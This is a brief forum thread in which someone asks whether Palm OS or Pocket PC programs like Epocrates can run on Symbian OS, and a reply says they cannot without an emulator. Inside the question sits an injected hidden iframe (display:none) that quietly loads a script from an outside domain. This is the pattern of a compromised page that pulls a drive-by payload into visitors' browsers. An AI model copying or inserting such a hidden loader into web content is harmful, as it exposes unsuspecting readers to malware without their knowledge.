using pocket pc / palm os software on symbian os

I want to know if you can use software such as epocrates etc on the symbian os?
Can anybody help or suggest solutions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

as is, the answer is no. Palm OS, PPC OS, and SYmbian are three totally different opeating systems and without an emulator there's no way to run any of the apps made for one OS on another.
